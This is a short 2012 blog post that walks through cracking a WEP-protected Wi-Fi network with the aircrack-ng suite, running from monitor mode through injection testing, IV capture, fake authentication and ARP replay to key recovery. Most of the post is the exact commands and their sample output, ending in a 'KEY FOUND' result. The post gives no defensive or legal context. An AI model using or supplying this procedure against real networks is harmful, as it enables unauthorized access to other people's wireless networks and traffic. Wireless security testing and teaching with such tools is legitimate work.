Thursday, January 12, 2012

WEP cracking

Step 1 - Start the wireless interface in monitor mode on AP channel

airmon-ng stop ath0

The system responds:



Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Step 2 - Test Wireless Device Packet Injection

aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0

Where:
-9 means injection test
-e teddy is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
ath0 is the wireless interface name

Step 3 - Start airodump-ng to capture the IVs

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0


While the injection is taking place (later), the screen will look similar to this:
CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782

Step 4 - Use aireplay-ng to do a fake authentication with the access point

aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Where:
-1 means fake authentication
0 reassociation timing in seconds
-e teddy is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
-h 00:0F:B5:88:AC:82 is our card MAC address
ath0 is the wireless interface name
Success looks like:

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)

Step 5 - Start aireplay-ng in ARP request replay mode

aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Step 6 - Run aircrack-ng to obtain the WEP key
aircrack-ng -b 00:14:6C:7E:40:80 output*.cap

Where:
-b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only

capture data for this one AP.
output*.cap selects all files starting with “output” and ending in ”.cap”.

Here is what success looks like:

Aircrack-ng 0.9


[00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)